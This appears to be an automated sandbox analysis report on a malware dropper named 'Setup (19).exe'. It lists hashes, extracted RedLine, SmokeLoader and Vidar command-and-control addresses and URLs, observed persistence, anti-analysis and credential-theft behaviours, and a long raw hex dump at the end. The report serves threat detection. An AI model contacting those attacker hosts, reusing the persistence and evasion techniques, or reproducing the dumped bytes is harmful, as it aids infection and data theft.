Resubmissions
15-10-2024 15:36 | 241015-s1zlzasdkc | 10
01-07-2024 18:32 | 240701-w6yteawhmq | 10
01-07-2024 14:52 | 240701-r82wmaxdnd | 10
01-07-2024 14:52 | 240701-r8syqa1dpp | 10
11-03-2024 21:22 | 240311-z8dsssgg58 | 10
01-09-2021 13:18 | 210901-5bmxjspa5s | 10
01-09-2021 13:04 | 210901-te4btfspqa | 10
01-09-2021 05:12 | 210901-4wnkwm1p3j | 10
31-08-2021 21:47 | 210831-41rp97dma2 | 10
31-08-2021 19:51 | 210831-359awwatje | 10
Analysis
max time kernel: 1807s
max time network: 1823s
platform: windows10_x64
resource: win10v20210408
submitted: 21-08-2021 10:21
Static task: static1
Behavioral task | Sample | Resource
behavioral1 | Setup (1).exe | win7v20210410
behavioral2 | Setup (1).exe | win10v20210408
behavioral3 | Setup (10).exe | win7v20210410
behavioral4 | Setup (10).exe | win10v20210408
behavioral5 | Setup (11).exe | win7v20210410
behavioral6 | Setup (11).exe | win10v20210408
behavioral7 | Setup (12).exe | win7v20210410
behavioral8 | Setup (12).exe | win10v20210410
behavioral9 | Setup (13).exe | win7v20210408
behavioral10 | Setup (13).exe | win10v20210410
behavioral11 | Setup (14).exe | win7v20210408
behavioral12 | Setup (14).exe | win10v20210410
behavioral13 | Setup (15).exe | win7v20210408
behavioral14 | Setup (15).exe | win10v20210410
behavioral15 | Setup (16).exe | win7v20210410
behavioral16 | Setup (16).exe | win10v20210408
behavioral17 | Setup (17).exe | win7v20210410
behavioral18 | Setup (17).exe | win10v20210408
behavioral19 | Setup (18).exe | win7v20210410
behavioral20 | Setup (18).exe | win10v20210408
behavioral21 | Setup (19).exe | win7v20210410
behavioral22 | Setup (19).exe | win10v20210408
behavioral23 | Setup (2).exe | win7v20210410
behavioral24 | Setup (2).exe | win10v20210410
behavioral25 | Setup (20).exe | win7v20210408
behavioral26 | Setup (20).exe | win10v20210410
behavioral27 | Setup (21).exe | win7v20210408
behavioral28 | Setup (21).exe | win10v20210410
behavioral29 | Setup (22).exe | win7v20210410
behavioral30 | Setup (22).exe | win10v20210408
behavioral31 | Setup (23).exe | win7v20210410
behavioral32 | Setup (23).exe | win10v20210408
General
Target: Setup (19).exe
Size: 631KB
MD5: cb927513ff8ebff4dd52a47f7e42f934
SHA1: 0de47c02a8adc4940a6c18621b4e4a619641d029
SHA256: fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
SHA512: 988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Malware Config
Extracted
https://dl.uploadgram.me/6120bc6269f31h?raw
Extracted
https://dl.uploadgram.me/6120bcfeb5393h?raw
Extracted
https://dl.uploadgram.me/6120c8f91373ch?raw
Extracted
redline
Second_7.5K
45.14.49.200:27625
Extracted
redline
www
185.204.109.146:54891
Extracted
redline
dibild
135.148.139.222:33569
Extracted
redline
19.08
95.181.172.100:6795
Extracted
smokeloader
2020
http://aucmoney.com/upload/
http://thegymmum.com/upload/
http://atvcampingtrips.com/upload/
http://kuapakualaman.com/upload/
http://renatazarazua.com/upload/
http://nasufmutlu.com/upload/
Extracted
redline
@Gerhdhd
46.8.19.177:41228
Extracted
metasploit
windows/single_exec
Extracted
vidar
40.1
937
https://eduarroma.tumblr.com/
profile_id: 937
Signatures
Glupteba Payload 2 IoCs
resource | yara_rule
behavioral22/memory/4028-302-0x0000000004900000-0x0000000005226000-memory.dmp | family_glupteba
behavioral22/memory/4028-311-0x0000000000400000-0x00000000027DB000-memory.dmp | family_glupteba
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
NetSupport
NetSupport is a remote access tool sold as legitimate system administration software.
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | Process | procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5128 | 2268 | rundll32.exe | 136
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 7756 | 2268 | rundll32.exe | 136
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 8736 | 2268 | rundll32.exe | 136
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 6724 | 2268 | rundll32.exe | 136
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
RedLine Payload 11 IoCs
SmokeLoader
Modular backdoor trojan in use since 2014.
Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
description | pid | Process | procid_target
PID 4736 created 4612 | 4736 | WerFault.exe | 109
PID 1220 created 4512 | 1220 | WerFault.exe | 129
PID 6064 created 508 | 6064 | WerFault.exe | 102
PID 5864 created 6248 | 5864 | WerFault.exe | 217
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description | pid | Process | procid_target
PID 7200 created 4028 | 7200 | svchost.exe | 99
PID 7200 created 6532 | 7200 | svchost.exe | 214
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
Vidar Stealer 2 IoCs
resource | yara_rule
behavioral22/memory/508-393-0x0000000004820000-0x00000000048BD000-memory.dmp | family_vidar
behavioral22/memory/508-403-0x0000000000400000-0x0000000002D0E000-memory.dmp | family_vidar
Blocklisted process makes network request 7 IoCs
flow | pid | Process
453 | 8600 | powershell.exe
453 | 8600 | powershell.exe
472 | 4240 | MsiExec.exe
472 | 4240 | MsiExec.exe
578 | 5372 | powershell.exe
596 | 2320 | powershell.exe
598 | 2320 | powershell.exe
Downloads MZ/PE file
Drops file in Drivers directory 4 IoCs
description | ioc | Process
File opened for modification | C:\Windows\system32\drivers\etc\hosts | Conhost.exe
File opened for modification | C:\Windows\System32\drivers\SET1C7E.tmp | mask_svc.exe
File created | C:\Windows\System32\drivers\SET1C7E.tmp | mask_svc.exe
File opened for modification | C:\Windows\System32\drivers\tap0901.sys | mask_svc.exe
Executes dropped EXE 64 IoCs
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation | RuntimeBroker.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation | cmd.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation | Weather.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation | Weather.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation | Setup (19).exe
Key value queried | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation | xtect12.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation | Gaemataeshani.exe
Drops startup file 1 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iZpAWbaURv.url | Esplorarne.exe.com
Loads dropped DLL 64 IoCs
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

resource | yara_rule
behavioral22/files/0x000100000001ab5c-138.dat | themida
behavioral22/files/0x000100000001ab55-128.dat | themida
behavioral22/files/0x000100000001ab63-147.dat | themida
behavioral22/files/0x000100000001ab63-166.dat | themida
behavioral22/files/0x000100000001ab55-157.dat | themida
behavioral22/files/0x000100000001ab5c-154.dat | themida
behavioral22/memory/3492-203-0x00000000012B0000-0x00000000012B1000-memory.dmp | themida
behavioral22/memory/2136-200-0x0000000000E20000-0x0000000000E21000-memory.dmp | themida
behavioral22/memory/3336-198-0x0000000000250000-0x0000000000251000-memory.dmp | themida
behavioral22/files/0x000100000001ab73-299.dat | themida
behavioral22/files/0x000100000001ab73-306.dat | themida
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Adds Run key to start application 2 TTPs 8 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run | aipackagechainer.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\ | aipackagechainer.exe
Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | Weather_Installation.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Weather = "C:\\Users\\Admin\\AppData\\Roaming\\Weather\\Weather.exe --Ac4FtzsAeC" | Weather_Installation.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\ApplicationName = "C:\\Users\\Admin\\AppData\\Roaming\\RuntimeBroker.exe" | RuntimeBroker.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\ApplicationName = "C:\\Users\\Admin\\AppData\\Roaming\\RuntimeBroker.exe" | RuntimeBroker.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" | 7300426.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Mozilla Maintenance Service\\Molaraxepae.exe\"" | Conhost.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.

description | ioc | Process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | CE4F.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | WgAQMBbuvnZa4Uim1cKe4vXj.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 0NKIqxJZOxkSqcoqQk5gff41.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 8md1vxAwe7Y0ndRiBYaafLjk.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | R4FS14llhaVLNhuh_1UBG_AQ.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | vwqOzdi1PVwJK8OTScrNyxPr.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | RuntimeBroker.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 9V6mnXHdynq1s7PpT244URZa.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | md8_8eus.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 6UIpSNXQ6X1bGK6xwzbZrjMo.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Od44Rf8EHJH4T2sW1PLJmC6c.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | md7_7dfj.exe
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Legitimate hosting services abused for malware hosting/C2 1 TTPs
Looks up external IP address via web service 12 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
139 | ipinfo.io
157 | ip-api.com
246 | ipinfo.io
374 | ipinfo.io
378 | ipinfo.io
29 | ipinfo.io
30 | ipinfo.io
137 | ipinfo.io
194 | ipinfo.io
202 | ipinfo.io
207 | ipinfo.io
213 | ipinfo.io
Drops file in System32 directory 26 IoCs
Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
Suspicious use of SetThreadContext 11 IoCs
Drops file in Program Files directory 64 IoCs
Drops file in Windows directory 30 IoCs
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Program crash 29 IoCs
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | svchost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | svchost.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
6944 | schtasks.exe
7744 | schtasks.exe
Kills process with taskkill 1 IoCs
pid | Process
6916 | taskkill.exe
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main | browser_broker.exe
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main | RuntimeBroker.exe
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main | browser_broker.exe
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main | browser_broker.exe
Modifies data under HKEY_USERS 64 IoCs
Modifies registry class 64 IoCs
550166efb4e789520166efb49ef755010f101f0fb8f3780c5624cb8d3b77c5f27d64e345b598a1c737983411010048c3458267ddf9b8b66727c88d0a46c5c44b64e345b59aa7c34632ea60dda800ffeab20daa004cc73f906c49010048cb4b37f0101f66e5ff3a440248c5cd41748179894147020000b9bb020000482b9bb0c35c28ea318ca80048c35390cd45b4023ec34337ea368ba80048cd45b41c24c74c8fc35d9ec3432030439b0048c34034ea1aa7a80048c3586ab40d0000ffea5ce3aa0048cd45b441cafadb8d5201b8b901000048c317b81c39010048c337986441010048c307a824010100487bff249972030048c945dc1901005e039e8bc34034eabb09a70033f32b222169850400ccbf6615007c691500859015008e9b150097821500a0b51500a9bc1500cc0000000000000084cb6fc41bfa36eab905a9008545cf8bc6430100b9b40d000048c1d57804dfead16da9008545cf8b94110100b9b40d0000ffea8c30a90048c35390cd45cf8b8c09010048c34337ea299ba7004cc75390cd45cf8b77f3000048c34320f8e708007a45b45762f9bc04000049c2589bc34023c3d7030000ea50eca90048c3d7780413f388cb47eceb8ac24023392806007a45b45762f9bd05000049c2589bc340231407040000ea03bfa90048c3d7780413f388cb47eceb8ac240238a9805007a45b45762f9be06000049c2589bc340232536040000eaf24fa80048c3d7780413f388cb47eceb8ac240231b0905007a45b45762f9bf07000049c2589bc340237665040000eaad10a80048c3d7780413f388cb47eceb8ac24023fce30800bbcf4b89c2589bc340239e8d040000ea8538a80048c3d7780413f388cb47eceb40be30323e01324f7bf9fa34635301ffea7ac7a80048c3d7780413f388cb47eceb0f00008c171fcb6fdc03cc38c2336750010101000033e15bb43f50530141f970c8000089b4cfa3500148c5802e725001c7c21044500101010000c7c2aa913f01f4f50100e8926f150033e19ac580dc80500141f970c80000e88e73150048c1d57864d078d3c501007ebc90fc5001e8eb03000f811c920000487104f99451017402105f04f69b510174190b5f04afc350017410ddb9080800e81ef503008b86752950014cc1807428500189c568046cc1889bce510148c34380c598d1d3160148c35327eaae1ca7004cc78e7124510148c3586ab801000041beaf1008c340233cc5110089b40f63500166efb45e33510166efb4117d5001b94df5010089b4204c50018984e6d63c01ebed8d86eede3c01ffeae859a4003904127f51010f8ac4be0000b7c3d7786473f349b41d70510148cb47f46f9c0f0000000000000000000000000084c184f4b64e0133f3030f000000000084cb6fc4ab
beccbe4e0101c6c2e6ac4e010000000075687b69109b8400000000b94df50100ffea8031a40083bef7854e0101759855dd640000ffea9425a40033f388cb47eceb0f00000000000000000074b90100003beba57e438fc289c34e0100000000c30f00000000000000000000000000000000aa0069109b8400000000487336340d3501f287675a8900d17691363e000d8777f0318b8908d9f9de370000cc00008c131bcb6fcc68c352eafa36ea66d7a40048c34034ea77c6a400ffea79c8a40048c34372b30d04c088cb47e47b13b7da45c4a40048c1c5682c40cb6fd481ae170000e83b4695008545b473bebb020000cde461c580fece3c01e822cb010048c3cf601c70c18cdfe43f0148c5c9601c70cb43c840c18c6f543f0148c38ec6fd3f0148c18c31093c0148c3cf606408c18c3d063f01c7c20b333c01090d04c007c20d353c0101010000c7c2172f3c0101010000b8b00800004823abc048c58007373c01488fc30503020000b8b00800004823abc048c3864f71320148c1c5482498b00800004823abc149c3863806320148c1c5482468c5803c97a600e8e8ff0000b7cb47fcfb0f000084cb6fc491b1080000e8ee06000048cb47eceb0f45c5682c40cb6fc491ae170000e8047894008545b47c83cf6014bb4305e461c58006363c01e89a72000048c3cf600c60c18cf7cf3c0148c5c9600c60cb43c840c18c87bf3c0148c38edee63c0148c18c49703d01c7c2370e3d01090d04c007c229103d0101010000c7c2330a3d0101010000b8b00800004823abc048c58023123d018bdf701478c19d1549c58072daa500e8a6b00100b7cb47eceb0f84c1d57804771fcb6fac08c35226ea8c3ba20048c33043f8000048c5d9707418c3448a76f33fea9c2ba20048cd45b4467acbe7401c3848c5c1687c10c3df70741cc74380c1c568147cc74c8fc5c1684428c1c5680c1bfa81c1d57804dfea4ff8a20048c3d7784c20cb47841f9c0f00008c1305011fcb6fac08c35226ea3e89a20048c3384bf8000033ccba76f388c5d9704428c34531ea0cbba20048cd45b44d71cbe7401c3848c5c1684c20c3df70442cc74380c1c568147cc74d8ec5c1685438c1c5680c1bfa81c1d57804dfeaff4ba100ff38447cfd7ecdf9cb47841f0105980f0000257e940300cc000084cb6fc4ad57a64dba69eb755cab69eb75629579fb757eb2b901000048cb47eceb2bb25e0400ebeeedc32f04000fb97688cb47eceb8ac25b98cb47ecc1e60f00004dc845cf9a5489cb47ecc1c52d010048c1d5782c40c1fd503458c1f5580461171ecb6fcc68c379bec77ac2fa2126ca04008444b57234f32901e80000e8a64d03008a5250cc606400f7b682bed3d13e0100747eb3be070000e8fa1a0800c7c2dde73e0101
010000e87b9003008444b4138faa4b090048c5808a8e0900e83ad40600e87996070048c580979d0700e829c70600e844ab070048c59874c2a30048c5803799a300e851a31a008545b55cc1f01b03008444b45468c5980cbaa30048c58007a9a300e8c93b1a00c7c26e543e01020200004072cd7541233dd0050040c47bf08acbb10000179b74070048c35390cbbb3874506cc34320f21f05008444b46c50c39053c34023ab4a09004cc74d7cb802000049c245312c2cfa1d273e01b8b901000048c3d7781478c3ff501c70c3f7586c00cb47e4611f9d0f84c1d5782c40c1fd503c4f1fcb6fcc60ca7b7a8ee1da3f0133e85e45bf7b37f32bbbaf37418cd7ec3f01e8cd27020040ca7270cc601cbbbefaf93f0102767eb3be070000e803ed0600e8da3103008994ad8e3f01e8bf54030040ca4527ff12050033e192ca4426d93405008444cf9a5648488bc3d7781478c3ff506408cb47e47f9c0f0084c34f8cc1d1786cc5c95891d94058c1c1405e0116171ecb6fac09c27b7b71b6c77a7457a77a362c59723f017f7834f3295bb200008dcfbd7c7bf9765dc25eb600008b5351cd6014b545cf8b098d00004cc74d4d5c9ec245264b5e0200745351cd6014b545b4023ac74d4d5c9ec245267c6e0500745351cd6014b37cfe745eae45b5526bc74df5e19bc2452690820500b3c74df5e19bc245268b9e0200b3c74df5e19bc24526a64e0000857a8b71867cfc765f66c74d4d5c9ec24526a8bd0200745351cd6014b545b4675fc74d4d5c9ec24526c92100008b5351cd6014dbed35e852d57814bb488bc3d7785c30cb4784011f01019d0f000084c1d5782c40c1e5483458c1fd503c4f1fcb6fcc68c3969824a10049c2737379bac362a1cd5eae7088ce42eaf95ac340238b6407004cc74c4c5d9ec346322c9bc3d7781478c3e7481c70c3ff506408cb47e47f9c8bc1d5782c40c1fd5034471fcb6fcc69c273735192c37a7279fb7470edd73b04004cc74c4c589bc34586c3d7781478c3ff501c70cb47e47fb69e89010033000025b6471800cc00008c131bcb6fcc68c35232ca69c34023b14118008545b5675acb78048a72efba5a0800ebeeedc323080048c3402347b7180048cd45b4a19dcb47e47b988bcb6fc4c0db390a008545b455442dc38f211530000048c3c340e3ee4d73f3bc6027f330b847bebc81b03d01759bdcf288cb47eceb73b1ea1c3b000084cb6fc4c01ffe09008545b473eff6160800ebf2f137d609008b4320986e1e008545b47036f22becef1fd62100b0b149cb47eceb8bcb6fc41bfa21a94001008444cf9a5588cb47eceb0f000084cb6fc4c0cf2b0c008444b57136f22bf9fa4a8527008444b572efcd290c00eb075cb149cb47eceb8bcb6fc4c073bc2700e8e6020c
00b0b149cb47eceb0f000084c1d5782c40c1e5483458c1fd503c4f1fcb6fcc69c272b0c27b7b5192c36201b85909008545b5629478fa74675ac344272bc605004cc74df5e19ac34632289fc3df707cd3c7687418c3d7781478c3e7481c70c3ff506408cb47e47fb66a941700cc000084cb6fc4c0ef0e09008545b46458c5808dbb3a0148cb47ecc10ec32400e8be4d1b008545b570edd92a1b0048cb47eceb8bcb6fc41bfa21f936270048cb47ecc1799b0b0040131bcb6fcc2fb9b376483a01854c72ba0100000f4b874b8d66583a01e832dc0600e805e70a008444b57136f22bfffc60ae26008444b57c3afa21d93a0b00eb0160498bcb47e47b980f000084c1d5782c5d1dc367a4cb6faccb525a7af80e8821a60000e88b6b08008545b45fae5eae526fc580d5e23b01e8975b24008545b47036f22b9132c580d1e63b01e8834f24008545cf9b542b8c2fc39e8cb22a0149ca4b3774497bf94000008363df14e378b1489a1b847ff18ec5cca5acc5ccade71f55a5acc5ccb502fd1f5dbdff1e1478473b014cc5cca5acc5ccade71f55a5acc5ccb502fd1e1c784f3b01f2fd1f5dbdff1e14744b3b01f2fd1e1c74433b0148c3d7787418cb47841d9e7abc050000e8b45e0200cc00000084cb6ff454c74a79f5175a00665f3c08d624008a0c312b66459b2400b7c598e8272500b7c5811c91b869154500752ae7b3090200665f78596d211867e9cdb8f6555cc5dc49504bd3dfb8f6474ec5818cccc181c682c19d306d72eaa56c93c1464077fab37881c94a0bc28d77fbb27a40cb41eac334ece19acd57a77136f22bff97f95e247d7936f22be1bab1eaed34f22be930f288cb47dcdb0f00008c131bcb6fccaa5331e30c070033e15745b47f8f5fae724fcf92634f380148cb47e47b9883131bcb6fcca0bda6a23801008a53ad708056a77b844123e82525008a41239d7c0900b0b149cb47e47b980f8c131bcb6fcc68c39e320d2b0148c3525241827b26260a38018362de779b1982cb79058a7f42c34023975d2200ebe447c3589bc5801e2a3801e812d8220033fa4c4588474b8f83c34a89cb47e47b980f84cb6fc4c04f580000b7bf2fc3db372f273780cb47eceb0f84c1d57804751dc367a4cb6fcc68cbe67d1848f389907df2b4b22b0048c38eac8028014873f8b61a27c5c055e7ea2fa09a0048c3ce5d50c1cc55efea31be9a008b4b88797455efea058a9a008b4b88c5c06d68797455efeaed6199008bce6568c5c05d588921c0687b7665687b7655587bf289f1460000000000ff00486be289f18a917df2b4b22b004873f88b474b8589c18c301c280148c3d7786c00bf2798c18c2b07280148cb47e47d9e8bc5806451390148b7da9f239900cc0084c58054613901e98564080048
c58858653901c38bc58858653901c38bcb6fc4c00f180000b7cb8b0cec0e190000b7cb8b0a4acb47eceb0f84c588b4f44401c340a61c01390100c38bc1d5782c5d1dc5218864bb0400b7c96d2cc505008b5260ae170000e84d2f8a008545b4708f4006e4aaa62d3039010048c5c0bdc3e193f968d40400e8df3f080048c5c0bd0fead05d980048c31675e8000048c5184ddc040048c3408e76f33feaa62b980048cd45b44874cbe7401c3848c5006de4040048c31e4ddc04004cc74380c1c568147cc7488bc50065ec040048c1c5680c60c5c0bdb8c1c5680413fa36ea6fe2980048c30e4dcc040048c5c1687418c10c6de8000033e19ac5084dcc040041f92098000048cb43c840c10c0d880000e848a7070048c30e4dcc040048c1cd6044a7836074451500408783607055010000ffea6be69800837bf949c5c9607418c1cd606408c5c8b5ff9b578bc1cd606c7bfa36ea008d980048c5c16864bfea179a98008545b57ffc2dc0dbe1240133360148c317b8f4d5050048c94504c505005d9e0f000084c1d5782c40c1fd5034471fcb6fcc68c5901718130148c5b836111301ebfd5ec3b073cd7a8b7e42c3442781690000ff289fcb40cb4073e5ac97adc3d7781478c3ff501c70cb47e47f9c0f0084c1d5782c40c1fd5034471fcb6fcc68c590d3df100148c5b8f2d61001ebfd5ec3b073cd7a8b7e42c34427f51d0000ff289fcb40cb4073e5ac97adc3d7781478c3ff501c70cb47e47f9c0f0084b7da4cf09900cc8c131bcb6fcc68c35291c3498ac580f064990048c18243c5de5b3bfa81c18342c1c34240c5c540e0ec0c080048c58808979a0048c18a4bc3488bcb47e47b980ffff388c1c85158c58806999a0048c1c84940c588ed71990048c18849c34a020f8c131bcb6fcc68c35291c3498ac5809004990048c18243c5de5b3bfa81c18342c1c34240c5c540e04ca3070048c588d04c990048c18a4bc3488bcb47e47b980ffff388c1c85158c588ce52990048c1c84940c588b529990048c18849c34a020f8c131bcb6fcc68c35291c3498ac58030a4990048c18243c5de5b3bfa81c18342c1c34240c5c540e0ac43070048c3488bcb47e47b980f000084c5881488990048c18849cb42c9e15cb20700cc84c1d5782c5f1fcb6fcc68c588f66b980048c372b1c1888a5192cb42c9e07a950700f635c27579b7a218000048c34427ac46020048c34c8fc3d7781478cb47e47f9c0f0084cb6fa400c5c16804c80a1c0100b7c59836381a0148c5c16804c8917e0700cc84cb6fa400c5c16804c8cadd0000b7c5989e901a0148c5c16804c8b15e0700cc84cbfa710848c588811c980048474a0449cb0f0084c1d5783458c1f5583c4d1dc367a4cb6fcca3e68de833fafaf307c23111240102
0200000fade6cf4a06c22404240101010000817092220c0900cf418ecf5993c070940b1a1d28c0739b070b2c08c0719e1a1109294edb94cf509fcf8e4a7b350141c072b234011c2d4ed25258974fd25873b5220b1b46fa4273bc4fd96ab90100000fad2bccb5b4cf428dcdc4b5734341d4a97ddca9b9c057a7271acb8eb49d2501ffbec24bcc21d5cfc0f04bcd8cf8ce32013dfdc60701745c155d66040274551c4d760402746e1fb54905037c7bd8576c53f3ba010101010100004847ac60b0784ac24bc945cd8cc6f0320145c05eae6c9860e10fffff8e78f90f6f6072794ac24bcc40cd8ca0963201b8bf07000089dcb5a4cdc4a9dfc3845817fac6ad2bccb579d4a97dc4b571dca975d4b5e7b559ea7a784ac24bca46cd8c74423201414eb55bf5671da9c20120250102020000c7c2fbdd220106060000414eb55bfa6820124eb55bfd6f3f7ffac60ed1988923c26843db98c1dc4558c3ce5534223a3a7347b98ed5f32201834bc0cfc2ba9c220103030000f6b3adc8a98cbc9a22017467904be8e7c2a385220105050000898ca187220148c3d7781c0bf388c3f7586408cb47e47d9e0f0074b9010000c30f00fff3f93c397c41010f9a550301c200cc25829e0a003300008c131bcb6fcc68c588fa69960048c35291c188f734c3757eb0a2180000e83e290000b7c3488bcb47e47b980f000000000000000084c1d5782c40c1e5483458c1fd503c4f16151514141717161fcb6fac0dc6ea6940c362a4c6b270c24381c2d2617566d7b1c67ab8c273b4c761026a7d000009b34162698a65e0000041cafd3e00c1e5481478c1f5581c03083c8cf97b01008b75b64bfc74cfbfff4877c3f78d28aa00008bcfbff34477c3f78c1e9d000083ff87eb100f8b1692000083ff87f70d75639ccfbff744c5c16814794ac78dc25e2a2f5545b805030af5fc7d63101e8d955d60cbbe6c6e3e0100746a56c58045773e01e8533f84008545b47ab4bb01000048c34632ea240e3e018bc7b7eb51f9b9010000494acf85c25e3dbc51050049c2cd060cc74e4edfafeb59c24689cfc64d494ad79cc1cd600c61c2cd6e60c1cd6004dfeac6419200e8be530500ff392fdcca0000ccf3295cb5000049c2fd5661caf5360162df1d7f9600008b44874bca42cf8fcf4877c3f78d008200008bcf8fc34477c38b0a3dcfde5145c261c254300176fa4c57a64c7dce4a8c4ec382c9cf87c74c73cb825262c9cf87cb4073cb83659dcf8fdb527b7d87d3657e80cf8fc74e7b7d87cf787c49be3e857ff1b8ba8c7ff1bf42bccf8fdb9545b4784473cb856b5bc057a750cefc9aca4648c25e94c8cf0e0ccfcf8fc7bdb04c4ec785be2f2f384c9828c1f58de29f000047b90100004cc1d1786409c2d06b79c2e05371c2f8
